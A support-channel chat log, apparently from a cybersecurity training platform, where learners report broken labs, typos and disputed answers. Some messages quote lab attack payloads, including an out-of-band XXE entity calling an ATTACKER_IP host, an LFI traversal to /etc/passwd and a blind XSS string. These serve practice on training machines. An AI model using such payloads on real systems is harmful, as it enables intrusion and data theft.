room threatinteltools question 6-2 What is the customer name of the IP address? Can someone double check if the domain has customer information.
https://uk.godaddy.com/whois/results.aspx?itc=dlp_domain_whois&domain=scnet.net I think i only see dns registry information.

Yes, but IIRC Talos no longer supplies it, you can get it om whois.domaintools.com

did you guess or double check. I powered on a linux vm and installed whois there. REDACTED FOR PRIVACY

I didn't guess, I know.

I helped someone with this just last week.

And I'm looking at it now.

Oh. the IP address and not the hostname used for the previous action.

If a sentence contains prevous and the next question also needs to contain previous it should contain previous.
this site isnt tested for people with wordblindless.

It states using the IP found in the "previous task"

Task
Use the information gathered from inspecting the Email1.eml file from Task 5 to answer the following questions using Cisco Talos Intelligence. Please note that the VM launched in Task 5 would not have access to the Internet.

Answer the questions below
What is the listed domain of the IP address from the previous task?

What is the customer name of the IP address?

NO it doesnt,

What is the listed domain of the IP address from the previous task?
IP from previous question

What is the customer name of the IP address?
not mentioned that it was the previous question. so i used the IP of the hostname of the current question.

If information is for all questions it should be on a higher level.
there is no tutor to ask questions and the hints are not that good so the information needs to be clearly transferred. TO make sure no mis communications are made.
I hate it some disability is coming back to my life after 20 years of professional work.

Same issue

Tried googling the hash? Many times they already show up in the search results.

Yes it does...

I see 2 questions one previous ip.

while the awnser of question one results in a dns result thus also an ip.

I see question 1 resulting in a domain name. A result you get using an IP.
That's different.

I'm sorry, but I dont understand. My issue is that in the room 'Persisting AD', TASK 4, running the Rubeus command as specified outputs an error: "KRB-ERROR (68) : KDC_ERR_WRONG_REALM

The IP you found in Task 5.

But let's say there was some ambiguity in the way the questions are phrased: that's sometimes part of the game. Ethical hacking requires creativity and constantly looking for alternative approaches. THM is not meant to be a strict procedure you can follow without thinking.

My approach personally after twice within a week reporting a "bug" that moments later turns out not to be a bug, would be to first share my concerns somewhere like #room-help in the future. Most likely users can clear out any misunderstanding there.

I was looking the wrong message or my phone got stuck while scrolling, sorry. Ignore what I wrote.

All good, m8. Appreciate your intention to assist

Hello, in this room is a typing error on Task 3
https://tryhackme.com/r/room/introtoirandim
The Role is Project Owner but the Text is about Product owner

I ran into the same issue, license is still expired. Any suggestions?

Hello, We're aware of the issue and is being fixed on

is there an issue or glitch in 'Red Team Recon; task 6', I feel as if I correctly answered the question and it's not being accepted for some reason. I found the author using the 'info' command.

someone else confirmed my answer as being correct.

As that someone and to give some background: The source code for the recon-ng marketplace was changed on May 2nd, the new author is Censys, Inc. <support@censys.io> not Censys Team anymore. Here's the commit on github: https://github.com/lanmaster53/recon-ng-marketplace/commit/cee20d8e7de5f0f8ba7e7e1845cebf2559359cec

That's referring to question 4 censys_email_address is a module that “retrieves email addresses from the TLS certificates for a company.” Who is the author?

Staff are aware of this one.

The answer just needs an update, staff aware.

From TShark: CLI Wireshark Features Task 6. Some might call this one nitpicky, but I think questions should be technically correct whenever possible. There is no such thing as the "HTTP hostname". The word "hostname" doesn't appear in the HTTP/1.1 specification, "host" does 42 times. The field filter in the question hint is ||http.host||, the header the user is supposed to look for is Host => It's the "HTTP host", better even "HTTP host header (value)".

Good morning. Can anyone tell me how to establish a shell rollback using a tryhackme VPN on my Kali Linux using virtual box? I can only get the shell to revert when I use the tryhackme machine in the browser, but not at my location, I'm new to the platform and I wanted to know how I can answer this.

Is the van active?

Vpn

Yeap, notice that.

Room: REmux the Tmux
https://tryhackme.com/r/room/tmuxremux
Task 6: first sentence needs fixed
The last four tasks have covered commands of how to use tmux with its defaults. Tmux by default doesn't have a default configuration file. That doesn't mean you can make one.

Should be "Can't" instead of "can"

The original can't seems correct? The text says there isn't a default, but it doesn't mean you can't, thus it means you can?

Correct. The next part shows you how to configure it

The last four tasks have covered commands of how to use tmux with its defaults. Tmux by default doesn't have a default configuration file. That doesn't mean you can make one.
Before crafting a custom configuration file for tmux. It might be a good idea to show all the options of the defaults. With tmux show -g argument for global.

thus it means you can? But it says That doesn't mean you can make one. where it should be That doesn't mean you can't make one.

Because you can in fact make one.

correct

Why is this still not fixed? More disk space seems to be required. This room is wasting my time.

Two messages below the one you responded to somebody reported a dead/404 link in a room. That was in October 2023. It is June 2024, the link is still dead.

The why I can't answer you though

still not working for me :(

the Splunk CTF is broken unfortunately...

It’s still being worked on

Once I have an update i’ll let you know

Hello the machine https://tryhackme.com/r/room/source the user that the vulnearble application runs is root . Unless intentional, there might be an error during the setup, cause its easy to obtain root access

I believe this is intentional. That room, afaik, is more to demonstrate the vulnerability (webmin). The root flag is just a bonus

Good luck getting webmin to run as a user other than root

Alright alright, just making sure everybody has the same idea

in the burp suite repeater section: pratical example, burp suite is telling me than the os isnt supported for render

You running Burp as root by any chance?

Yes, on attackbox

Try either running it as another user, or disabling the sandbox. There are instructions for that in the first room

https://tryhackme.com/r/room/easyctf Question "What is running on the higher port?" wants "ssh" but the port says "EtherNetIP-1". In old write-ups I see that it's true that ssh is running but this might have changed since i see this other service now?

are you scanning with -sV and -sC

if not that is probably why

That solved it. Thanks! This isn't a bug. I should probably have rewritten it as a question and asked in room-help first.

nah no problems

some people just get in here first when they don't understand and that is fine

Room: networkservices2
Task: 2
Bug: broken link

• broken: https://www.datto.com/library/what-is-nfs-file-share
• fix: https://www.datto.com/blog/what-is-nfs-file-share/

Hello, there is a problem in your room.

https://tryhackme.com/r/room/linprivesc

5. section

What's the problem?

^ ?

While transferring the folder named OFC from the normal machine with Atak Boca wget, permission was denied. The reason for the error is that there is no load of a module, shouldn't I do this?

https://github.com/SecWiki/linux-kernel-exploits/blob/master/2015/CVE-2015-1328/README.md

What folder did you write to on the target machine.

?*

I did it as I entered, it didn't work, I put it in /tmp and it worked, but at that time it said a module was missing and I quit trying to solve it with ctf.

I guess I was here

I was in the home directory, so in short

Transfer it, then compile it on the target machine.

Yes, it happened in YouTube videos, but I don't know why it didn't happen to me, is it a bug or something?

I am using the system as root, so could it have caused an authorization error?

Where I closed it with white color, it says permission denied and it doesn't load, but it gives information as get on the python3 server.

If it happens to you, it's okay, I also have a problem, but my opinion is to use it as root and when wget is installed, it gives an error because it cannot access that file.

If it cannot access the file, have you checked that the file you are trying to fetch is in the same directory where you ran the python3 http.server module (or pointed it to the correct location in your wget command if not)?

Some things I've noticed while doing https://tryhackme.com/r/room/bufferoverflowprep

It says "generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server"

But for me to get it to work I had to use a pattern of the exact length that crashed server, not 400 bytes larger (Only OSCP1 is like this, the later rooms seem to use 400+ bytes)

When it says run the following mona command: !mona findmsp -distance 600 , it could be a little clearer you are to run this directly after a crash

Sigma room
Soc 2
The kibana service isn't working and i can't access it to restart the service

This post is nearly a month old. I am also stuck here. Any progress yet?

I’ll ask for an update from the team

maybe something wrong with this room https://tryhackme.com/r/room/brainstorm

found the ftp server, rdp and the chat server

found login for ftp

but cannot list or download from ftp

tried filezilla, command line, followed the writeup to the letter. still nothing

i did crash the server while connected to it, in case im supposed to debug with error messages or something. but nothing displayed

figured it out, had to set 'passive off'

now its working

Hi. I think it's been reported before but I'm having problems with Red Team OPSEC (https://tryhackme.com/r/room/opsec) Task 7.

I've tried Chrome as well as Brave but all I can do is move the boxes Threats, Vulnerabilities and Risks to Critical Information or Countermeasures.

That's intentional

How long does it take for the error to be rectified?

Currently going through SOC Level 2 --> Detection Engineering --> Sigma room, but being halted due to the Elastic Kibana siem not loading properly no matter how long I wait or terminate/deploy a new vm. Throws error "Kibana server is not ready"

I have raised this and is being worked on 🙂

Thanks @topaz thorn

Gave +1 Rep to @topaz thorn (current: #53 - 138)

Thank you!

Gave +1 Rep to @topaz thorn (current: #53 - 139)

thank you! trying to take a stab at it again this morning but still doing the same thing. but thank you for confirming this has eyes on it! ill work on something else in the meantime

Gave +1 Rep to @topaz thorn (current: #53 - 140)

I tried this morning also...its the last room I need to complete network and System security : (

Hye guys in Insekube the port 80 is not running

This is a known issue and being worked on

The Machine stopped after after a few percent loading.

was trying to restart few times

NVM it's booted now

Morning all!

In the Redline Room, I'm struggling to get the analysis stage to work properly.

I have created the Redline script exactly how task 2 details, run the script as administrator, waited for it to finish.

When opening the "AnalysisSession1.mans," the analysis does not have any analysis data.

The only things in the left pane are, Timeline, Tags and Comments and Aquisition History.

I've restarted the machine multiple times, and have tried across the last few days, and get the same result every time.

Anyone aware of something I might be doing wrong or could this be some kind of bug?
The Analsis folder I create is over 7GB, so it would indicate that something is there?

Not necessarily a bug:

https://tryhackme.com/r/room/oscommandinjection

Task 2:

1. The application stores MP3 files in a directory contained on the operating system.

The code in the application does not actually store any files anywhere. It simply defines the variable where files are located. This is a distinction. Perhaps I am autistic and that's why it stood out to me, but if this could be changed to,

1. The application accesses MP3 files from a directory contained on the operating system.

It would be more accurate. As a PHP dev, when I think of 'storing' files, I usually see some storing logic, which we don't have in our mp3 example.

The Room issue is not solved

Also
Aurora EDR isn't working correctly
It is not showing the specified logs

@topaz thorn

I’ll check on the status of it tomorrow

Can you verify and share a screenshot of the logs not working

Ok

I ran the patch file multiple times using cmd and powershell and run as an administrator, still the exact log won't appear

@topaz thorn

I’ll check when I’m back if not i’ll see if i can replicate tomorrow

Any updates?

Hello, will just post my message from #general , did not know this existed.

I think Intro to Cross-site Scripting needs a bit of updating if I'm not wrong, the last challenge being Practical Example (Blind XSS), there's the written theory with pictures referring to </textarea>test but I did not see textarea anywhere in the code, the ID of the tickets that we create in the Support Tickets tab are wrapped in <td>test</td> tags.

Attempting both </textarea>test and </td>test ticket creation will return empty string in the system (I did not test if <td> payload works but the images provided in the theory and the source code in the actual machine do not match).

EDIT:
Both payloads work, though the </td>test one seems to be affected only on returning from the page of it, clicking upon it doesn't prompt an alert of a blind XSS.

If you inspect it, <testarea> is there.

And it's there.

Also <textarea> is there when you create a new ticket.

You're absolutely correct, I believe I was wrong because I tried to inspect the main page of the web tickets wondering if we should be looking for textarea there but it seems to exist once you click on the actual ID of it, thanks for the confirmation!

Gave +1 Rep to @quaint sparrow (current: #1 - 2470)

Any known issues with Breaching Active Directory?

Stuck on Task 6, steps aren't that complex

bcd transfer = connect ransfer failed

filename is correct, ip is correct, looked at three writeups, all looks good

The sigma still being looked into. I'll have to check Aurora

are you scanning the correct target machine???

was more refering to that there are 3 different target machines in that room and you need to make sure you are running and scanning the right one

Gave +1 Rep to @rugged canyon (current: #4 - 1812)

yeah

hello please i need some help in room https://tryhackme.com/r/room/redisl33t

i find the pasword but i cant acces via ssh

with user blue

output connection closed by ip port 22

yeah because red kicks you out over time unless you use some tricks

and every time he kicks you out he changes the ssh password so you need to rerun hydra

no before i put the password

without any demand of password

yes i knew with hydra everytime it give new passwd

hmm okay then dunno what is wrong

i have no idea

this isn't the first time

many room i can't acces via ssh

i restore the machine in trtyhackme and ssh service on mine

but no result

okey thank you

oh maybe it is a vpn problem then

@verbal wren ⬆️ try this just to make sure it is not the cause

okey thank you so much @@rugged canyon

Gave +1 Rep to @rugged canyon (current: #4 - 1819)

In room Wireshark - Packet Operations Task 3 Q1 "What is the most used IPv4 destination address" the answer seems to be the wrong addr

👋
Some issues to flag in https://tryhackme.com/r/room/introtologanalysis

• Task 3: analysts can identify correlations and patterns that need to be apparent when analyzing logs individually. -> ...may not be apparent...
• Task 5: (the last table's text is tiny...? 1rem)
• Task 9: the table row detection sshd This key lists what the Sigma rule is looking to find. should probably read type: sshd ...

Hello, I am having an issue regenerating an environment in the AWS path. On first generation I the room was missing a required resource so I spent all 3 of my regenerations attempting (and failing) to reset my environment. Now I am locked out yet again and won’t be able to make any further progress 😔

Room: AV Evasion: Shellcode
https://tryhackme.com/r/room/avevasionshellcode

Location: Task 3 PE Structure

Issue: Missing link to this room:
https://tryhackme.com/r/room/dissectingpeheaders

Room: https://tryhackme.com/r/room/livingofftheland

Location: Task 2 : Windows Sysinternals

Small typo, I guess... should be Built-in

Hey, I just got an update that this should now be fixed

Hi @topaz thorn : This problem still exists. Did you solve it finally? Please re-check.
PS: I wanted to paste a screenshot, but it isn't working. I also cannot find any upload possibility to attach it to this messages. But anyway. It's still a problem with the certificates.

Hey, i'm only support. Unfortunatley I can not fix this issue. I will ask for an update

HI there,

try to solve the Include challenge but it crashes. I exploted the LFI + log poisoning (mail/ssh) but impossible to exploit the RCE the website crashed when i try to reach /var/log/auth.log

Hey,
Room: https://tryhackme.com/r/room/xxeinjection
Task: 5 (Exploiting XXE - Out-of-Band)

After sending the payload to the server inside the XML, that includes the link to my http server:

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://ATTACKER_IP:1337/" >]>
<upload><file>&xxe;</file></upload>

, a request sholuld be triggered. Unfortunetly I dont register any requst on my side, eventhough the server returns 200 statuscode (see the screenshot ).

Thank you in advance!

To confirm, is 10.9.0.5 your THM IP?

Yes it was

Can you try adding this in your request (on top of the doc-type)?

<?xml version="1.0" encoding="UTF-8"?>

Disclaimer: I haven't done this room, but have done a CTF is a bit similar to this one.

I have tried it as well. Didnt work. Did u try sending the payload? Maybe there is a problem on my side

Room: https://tryhackme.com/r/room/nosqlinjectiontutorial
Location Task 4 : Operator Injection: Bypassing the Login Screen

The link for the machine literally opens string machine_ip in the new tab and not the real one (but works fine in Task 3).

Not a bug but the last question in the Log Operations room is tiny

Room name: Source Code Security
Room URL: https://tryhackme.com/r/room/sourcecodesecurity
Task: 7
Issues: Plenty. Let me explain...

Broken cloning

tl;dr: The Gitlab service was configured using a different domain than the one we get assigned in the room, thus cloning fails unless hotfixed - the room assumes everything works and does not provide details for hotfix.

Upon started the room you are told to spawn a Gitlab instance which gets a URL and an IP. Url example: https://10-10-127-92.p.thmlabs.com, IP example: 10.10.127.92. You are told to log in and set up your SSH key. So far so good. Then comes the cloning...

As you are told to visit the URL, when you try to clone the repo, Gitlab generates a (git) clone URL, e.g.: git@gitlab.tryhackme.loc:gitlab-instance-dc881f3b/uscss-nostromo.git
Notice the domain gitlab.tryhackme.loc. This obviously fails to resolve when git cloning, but the guide assumes that everything works just fine and carries on.

To fix it, we need to use the IP address URL instead, i.e. http://10.10.127.92 and set up /etc/hosts to point 10.10.127.92 to gitlab.tryhackme.loc.
This is not mentioned in the guide.

Git commit without adding

tl;dr: git commit without git add, but assumption that "commit is enough".

Moving on we finally made the changes needed and are ready to push a PR. The guide says to git commit -m "Fixed credential hygiene by using environment variables"

But, as anyone who has worked with git can tell you, you only commit the files that have been staged for a commit. A -a flag or more explicitly git add nostromo.go needs to be added otherwise, well, nothing will be committed:

root@ip-10-10-159-147:~/uscss-nostromo# git commit -m "Fixed credential hygiene by using environment variables"
On branch birb
Your branch is up-to-date with 'origin/birb'.

Changes not staged for commit:
    modified:   nostromo.go

no changes added to commit

Suggestion to update the text to the following:

Once you've made your changes, add and commit them to your local branch using the following two commands:
git add nostromo.go
git commit-m "Fixed credential hygiene by using environment variables"

To push your changes to the remote branch, use the following command:
git push -u origin <branch-name-chosen-earlier>

Meaningless comment about "hidden flag"

tl;dr: Meaningless and confusing comment at the end of the room.

At the end of the room, the following comment is made:

Don't merge the changes yet, we still haven't finished securing the Nostromo API. Continue to the next task to retrieve the final flag!

This suggests that the "hidden flag" is to be found in/around the environment we have already been exposed to. This is not the case however.
The comment is confusing, meaningless and frustrates more than it helps. Not really a "bug" per-se...

FYI authors: @dense seal / @lucid oasis (I assume? "ben" with black dancing cat icon )

Please don't ping staff, especially Skidy.

Staff will check in on this channel, so pinging them isn't necessary.

noted, sorry

No worries! 😄

We're reviewing this with the team. 🙂

Anyone having trouble with the Kubernetes section of Security Engineer pathway?

Room: Exploiting Active Directory
Link: https://tryhackme.com/r/room/exploitingad

Issue: Following Task 1, Introduction, we get to this link, which leads to this room:
https://tryhackme.com/r/room/activedirectorybasics

But even after trying to join, nothing changes, and says: User is already in the room.

Room name: CI/CD and Build Security
Room URL: https://tryhackme.com/r/room/cicdandbuildsecurity
Task: 3
Issue: Misinformation

In this task it is stated that:

A Typical CI/CD Pipeline

So what does a typical CI/CD-enabled pipeline look like? The network diagram of this room helps a bit to explain this. Let's work through the different components that can be found in this pipeline:

• Developer workstations - Where the coding magic happens, developers craft and build code. In this network, this is simulated through your AttackBox.
• Source code storage solution - This is a central placeholder to store and track different code versions. This is the Gitlab server found in our network.
• Build orchestrator - Coordinates and manages the automation of the build and deployment environments. Both Gitlab and Jenkins are used as build servers in this network.
• Build agents - These machines build, test and package the code. We are using GitLab runners and Jenkins agents for our build agents.
• Environments - Briefly mentioned above, there are typically environments for development, testing (staging) and production (live code). The code is built and validated through the stages. In our network, we have both a DEV and PROD environment.

The problem:
Multiple sources* (my own professional experience as well) clearly define the "CI/CD Pipeline" as an automated process from and including the Continuous Integration step up to and including the Continuous Delivery step.
Developer workstations are not part of "a CI/CD pipeline". Neither are source code storage solutions. One could argue that these elements interact with a CI/CD pipeline eventually, but they are not part of one as stated.

*) IBM, RedHat, GitLab. The Task even quotes a source from GitLab that clearly explains what a CI/CD Pipeline is, and it's not the above. https://about.gitlab.com/topics/ci-cd/#what-are-ci-cd-pipelines

(I could be reading it wrong but in that case my suggestion would be to reword it so that it is clear that this list is not what is in a CI/CD pipeline but rather what can be found in the LAB, which so happens to be using CI/CD.)

Room name: CI/CD and Build Security
Room URL: https://tryhackme.com/r/room/cicdandbuildsecurity
Task: 3
Issue: Wrong answer to question
The question What element of a CI/CD pipeline builds, tests, and packages code? wants you to answer ||build agent|| but this is not true. They execute the steps defined in the pipeline, they are not part of pipelines.

Yeah it's "fixed" but i hope the one who is creating these rooms will stop creating them and make something useful instead. It's really annoying how much i spend time trying to learn something useful and find that rooms aren't working correctly!!! Aurora EDR still doesn't work properly the only thing that changed is the number 4, the room title was THM_AURORA_4 and now it is THM_AURORA_5 but guess what? It's not working properly

!!

Add the files that will be scanned by aurora agent to windows security exclusion and restore the license file from the recycle bin
I did all of the above and i was only able to solve the last two questions the rule of wmi isn't able to detect anything and it won't log the event on the event viewer

👋
Might be good to addda note in /bufferoverflowprep to this effect: #room-help message
I've seen a few folks get tripped up there already

Room: https://tryhackme.com/r/room/credharvesting

P.S.
The other one I posted, was probably there not to reveal the answer, so I deleted it...

Thank you, I have reported this

Gave +1 Rep to @obtuse ingot (current: #645 - 6)

@dusky junco Hi there! Just completed Tony The Tiger lab https://tryhackme.com/r/tonythetiger and ran into the Security Manager bug/feature that plagues all recent java versions. Just looking out for other current learners who likely will be on the latest Kali version that by default comes with java-21 and likely will have no idea about downgrading.🙂
My solution:

sudo apt install openjdk-11-jdk
sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1
sudo update-alternatives --config java
#Select version 11 from menu
#Run room exploit.py script

Hey thanks:) yesss. Downgrading java can be a bit of a pain and that room is ooooooooold

I'll add this as a snippet/recommendation to the room:) thanks for sending that through!

Gave +1 Rep to @dark raptor (current: #330 - 15)

my pleasure - always looking out!

root：HOLO
vpn file is empty

@stiff tundra

We’re aware of it and raised

Hey ! Just want to notify.
The investigating windows 3.x need to be completed a log save for sysmon process and this save does not exist in the machine.

Found what appears to be valid credentials. but is not accepted as an answer.

What are the login credential for initial access.

Answer format should be in username:password

THM_EXPLOIT:123456

for Binex room

took a peek at a writeup, they use a diff username.

Room: Splunk: Data Manipulation
Link of the room: https://tryhackme.com/r/room/splunkdatamanipulation
Task 6 : Event Boundaries - Understanding the problem

The link leads to:
https://tryhackme.com/r/room/reg101.com

and not to;
https://regex101.com/

P.S.

I don't understand why this is mentioned here, but maybe that's just me...

Okay, now I understand, seems like the last line is missing and should be:

host = vpn_server

Like mentioned in later tasks, for other ones:

I recently picked up on the kubernetes challenges once again, mainly Insekube and Kubernetes for Everyone. I tried to restart the machines numerous of times but everytime i start them, all the ports are filtered and i cannot access anything. Although i searched in discord for possible remedations , i couldnt find any. Could someone from the admins take a look on it please ?

It's being worked on.

Every time starting VM when "Large screen recommendation" appears it starts FTP machine instead of SMB. When browser is full screen the right machine is booting. It cause that in Complete Beginner > Network Exploitation Basics > Network Services > Task3 > question 1 can't be done. Nmap scan shows 2 open ports instead of 3. May be other questions also not possible to complete

Hey, this is a known issue and the team are looking into it

Can someone help me out with the Virtualization and Containers room? I'm using "minikube start" but all I'm getting is errors. I can provide screenshots if needed

I also tried running with sudo and also running the binary in the home directory, but no change

https://tryhackme.com/r/room/advancedelkqueries

Hello, there appears to be an issue in Virtualization and Containers with machine "Minikube Server v1.9". "minikube start" only results in errors, making the tasks impossible to complete without copying from a guide

It seems to be reaching for "registry.k8s.io" to start, but the machine has no internet connection as "ping 8.8.8.8 -c 15" returns a 100% packet loss

Any assistance would be appreciated

Oh, I also tried to run using the binary located in the home directory on this machine and that doesn't work either. Running the binary or command with sudo immediately kills the process as it specifically does not want to be run as root

maybe not technically a bug, but definitely an extremely annoying inconsistency - the osiris room requires using RDP, which I've done from the attackbox in several other rooms, using both xfreerdp and remmina. However, in the osiris room, neither of these options work for the required user. Instead, I had to vpn from my windows desktop and use the native rdp client, which worked fine. However, this wasted several hours on an already-painful room, and seeing as this is necessary for the final portion of the room, it requires redoing the entire room anytime you stop and come back to it. Seeing as this room is already set up in kind of a stupid way solely for the purpose of being annoying and wasting time, this really just makes everything that much worse.

set up in kind of a stupid way solely for the purpose of being annoying and wasting time
Which aspect? My memory from testing that one is that the fiddly bit is literally a big part of the challenge -- and a realistic scenario at that.

As a side note, I also remember xfreerdp working just fine 🤷‍♂️

Although yes, either way you're right -- that's not a bug so much as a "get-used-to-jumping-through-hoops-to-make-things-work-because-you'll-find-that-a-lot-irl" thing

Excellent point.

Hey there is a typo in the 'Active Directory Basic' room. Task 7 -> second question (... request further tickets known as TGS?) Where TGS is refering to Ticket Granting Ticket (TGT).

No. The ticket they ask for is a ticket (TGT) that allows you to request a TGS.
When a user wants to connect to a service on the network like a share, website or database, they will use their TGT to ask the KDC for a Ticket Granting Service (TGS)

I understand the confusion. The TGS is referring to the further tickets and not to the type of ticket in the question.

TGS

In https://tryhackme.com/r/room/misp, in Task 3 - Using the System
the URL's link is broken, it SHOWS the correct one (http://10-10-192-63.p.thmlabs.com/), but the hyper link goes to a broken one (https://lab_web_url.p.thmlabs.com/)

It's not "broken" the link is supposed to auto update.

but it doesn't when I click on it I go the wrong link

I go to https://lab_web_url.p.thmlabs.com/

Yeah, because it'snot automatically updating.

Try ctrl and F5

starting the machine, one sec

Doesn't fix it

Hi,

I found an issue within the room https://tryhackme.com/r/room/encryptioncrypto101

I hope this is the right channel to report this issue.

In Task 8 the question asks for the issuer of THMs certificate. The answer only accepts is E1 but my browser tells me it is E5.

Room URL: https://tryhackme.com/r/room/snappedphishingline
Summary: The URL for the phishing kit does not work anymore (domain expired...).

Room: Insekube Problem: port 80 not working to be able ti view the IP in browser

using attackthebox with premium subscription

Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
bo port 80 after waiting a long time

no*

This sort of answer will change from time to time.

There is a lab named "Sakura" where there is a task to find her wifi password in deep paste which is changed domain so the paste has been removed so without walkthrough noone can solve that lab.

I think answer of labs should have to change by time like in "Shodan" room there is a question which is most popular protocol {http or https} and in today date answer is https but in that lab answer is http which is popular earlier when the lab is created

Same exact issue with Room: Island Orchestration

The port shows as filtered to me.

May still be coming up

After three machine restarts and waiting 10 minutes each time the web servers did not start.

So in that lab, the hint has a screenshot of the paste in question. It's a pain but you can get the right answer from that.

I enrolled in the Jr Penetration tester path on THM and I’m currently in the File Inclusion room then I think there may be a small syntax error in the room

So it’s simple it’s just in the Local file inclusion #2 part the syntax is http://webapp.thm/index.php?lang=../../../../etc/passwd instead of http://webapp.thm/index.php?file=../../../../etc/passwd

And normally if we trying to access a file it should be file not lang

I been trying w lang and getting the same page w no difference several times before noticing the problem

Just so I'm clear, you are on Task 5 LFI #2 and you are using Lab #3, per the first question?

But you are trying to use lang? did you try to input something in the text window to 'include'?

Reading back over your report your must have. So the text in the room doesn't match the practical side of things, is that what you are getting at?

yeah i do it but now deep paste v3 has been released so you can paste it there that will be more helpful to find things on dark web 😆

Thanks for the info.

Yeah that it lang is trying to access a lang file for the page like EN or ES and when trying w file it does print the flag or get to the file

stupid in the sense of forcing you to go back and do a previous room again. While yes, in a real situation you would grab and keep all that data to pivot etc, that makes no sense in the context of THM challenges, and literally serves no purpose but to waste time and be annoying.

also I suspect the reason neither rdp client worked is because they're so outdated (along with the rest of the attackbox). And yes, having to find workarounds and try different things is "realistic". Providing us with broken tools is a crappy way of doing that though.

Attackbox is updated regularly.

However some of the older rooms won't work if everything is updated to the latest release.

Yup^ the Attackbox is not updated to the newest version of every tool for that reason.
All tools are tested.

it really is not, because the os is too old to update a lot of things

can't run python3.10, can't really run node/npm without major headaches, can't use anything that requires remotely recent glibc

a lot of docker containers can't run at all

Name a room and task that is broken on the attackbox?

I don't keep a list, I have reported many

If you can provide any information, I will take some time and test the rooms to ensure they are working

I will continue to report them as I come across them 🤷‍♂️

Feel free to ping me 🙂

it can't be updated that often, there's a stale apt repo in there that breaks apt entirely until it's removed, and it's been that way for a couple months

Thank you for bringing this to our attention 🙂

Gave +1 Rep to @woven lichen (current: #2143 - 1)

honest question - do you guys not read site feedback? I report all this stuff that way usually

Yes we do

I've reported the apt repo at least twice

as well as the various rooms that have issues with the attackbox

but it all kind of goes into a hole

Where?

I can't see it in your past messages (Being only 26).

well I've certainly submitted more than that in the past year, over the general site feedback button. I can't see my own submissions so I can't really be more specific than that

I'm refering to the Discord server, I'm not staff so I can't see what you do on the website.

right, when I asked about site feedback, I meant on the site itself

I report things there but nothing ever seems to come of it

Hey @woven lichen

I was hoping you could provide me with some details so that I can better understand the issue.

For Docker are you:

• Building from a Dockerfile
• Building containers yourself
• Trying to pull images i.e. docker pull imagename and b) that Dockerfile itself or image

Could you provide what the docker image you are trying to use is?

For apt,
What are you doing before the error occurs? Do you have a screenshort of the command and error?

the apt issue is just that the hashicorp repo has been removed for this version of ubuntu. Removing the sources file will fix that.

For docker, I haven't run into that for a while since I was mainly doing it to try to circumvent the other tools that don't work, and I've mostly stopped doing that and just use a different machine if I need newer stuff to work. So I don't remember specific images I was using, though they're probably in reports somewhere as well. But I was both attempting to pull existing images as well as build some (from git, with dockerfiles, I didn't make my own)

vaguely related: if there is a way to get crackmapexec or netexec working on the attackbox, that would be nice for the rooms that want you to use it

Hey 👋 I'm the AttackBox developer. Thank you for passing on your feedback and apologies for the inconvenience you've had.

From my initial testing, apt update & upgrade seems to complete. However I do confirm that the hashicorp source should be removed from the sources list. I'll action this in my next set of updates.

I'll look into getting access to your feedback to get some better insight as to the root causes re. Docker, the node/npm, and crackmap/netexec issues, as I don't have access to this on the site and investigate from my end. Would you be able to share your tryhackme username please? Feel free to DM me if you'd prefer to keep it private.

I will say generally from my point of view, I do have to be careful about what gets updated and when. My ethos is to have maximum compatibility across for our content, even if it means that certain tools don't have the latest and greatest features.

Thanks again for raising this. I've taken this onboard and will investigate as best I can!

Gave +1 Rep to @woven lichen (current: #1423 - 2)

how do you bug?

You wish to report a bug?

Can't find id_rsa inside tmp directory in kenobi room
Any suggestions ?

Vm or attackbox?

Checked it out, no issues on my end.

via kali vm.

Checking attackbox.

Following all the steps in the room I was successful at completing the room from both attackbox and from my VM.

I did run into an issue with the transfer of the id_rsa file to the /var/tmp directory, but it was due to a typo on my end.

It could be their mtu.

Which is why I asked if it was attackbox or vm.

Sure, was just making sure the pathway was correct. Been a hot minute since I messed with Kenobi.

That room is ancient. Chances of it having changed in the last 5 years are slim, so if it wasn't broken before, it's unlikely to be broken now 🤷‍♂️
Not impossible, but highly unlikely

It won't be changed, but some people have issues with their MTU being too higher and the fragmented packets don't display the contents of the smb.

Come on, you should know this 😛

From an Analytics perspective, is this related to answering a particular Task + Question?

Yes, as sometimes when the empty used to High the SMB won't display the contents.

I've never reported it as a bug as it seems to depend on each individual's connection. So it's really affected when a 15

I see, does it impact answering particular questions in a particular task? If that's the case, I can check the stats on our end.

That way I can see if it potentially impacts many users. 🙂

Only when the files are needed in an smb/ftp (kenobi, network services) like an id_rsa

Id_rsa is needed to progress the machine

That was in response to "making sure the path is correct". I know MTU can be a problem

I get that, I ran through it to refamiliarize myself with the room. Either to help the person out, or to confirm their issue. I completely agree with you that it's highly unlikely that anything suddenly doesn't work.

Fair!

https://tryhackme.com/r/room/pythonforcybersecurity

Task 3 Directory Enumeration:

How many directories can your script identify on the target system? (extensions are .html)

The target system IP is 10.10.71.144 however, there is no web server running there. There is only port 53 open. So how exactly am I supposed to scan the target system for directory enumeration when it doesn't have a web server running?

I've restarted the machine twice, and waited over 10 minutes each time and there is no web server running. Only port 53 is open.

In TheHive Project (https://tryhackme.com/r/room/thehiveproject), Task 5 (Analyst Interface Navigation) Q3:

Upload the pcap file as an observable. What is the flag obtained from https://10.10.69.245//files/flag.html

Link as given in the task doesn't work. Switching protocol to http (ie http://10.10.69.245//files/flag.html) gets it working.

Is the two // after the ip needed?

You have http://10.10.69.245//files

Doesn't appear to be, as it works with either / or // after the ip.

Hello there is a bug in the Threat Intelligence Tools room that is part of the SOC 1 Path.

https://tryhackme.com/r/room/threatinteltools

Task 7 Question 2 is not answerable anymore as the list of Aliases for the attachment in the email no longer contains the answer to the question.

I wanted to do the Unattended room but it is extremely slow and registry explorer won’t even start. Waited more than 5 minutes and it is still starting.

No "start attackbox" button in this room.

It may be intended because of the the attackbox not being needed in the room and to avoid confusion with using the attackbox or not btw

(https://tryhackme.com/r/room/summit)

in the new room of SOC1 is missing the button for start the attackbox

Check the message on #general, the homie answered your question.

100% intended indeed. 🙏

Hello there is a bug in the Threat Intelligence Tools room that is part of the SOC 1 Path.

https://tryhackme.com/r/room/threatinteltools

Task 7 Question 2 is not answerable anymore as the list of Aliases for the attachment in the email no longer contains the answer to the question.

You can't use Talos for the answer, but you can find it in other websites.

Yes I was just able to find it through another tool. My concern is the challenge question itself specifically says "Talos Intelligence" so just wanted to point it out since the answer is no longer findable through Talos.

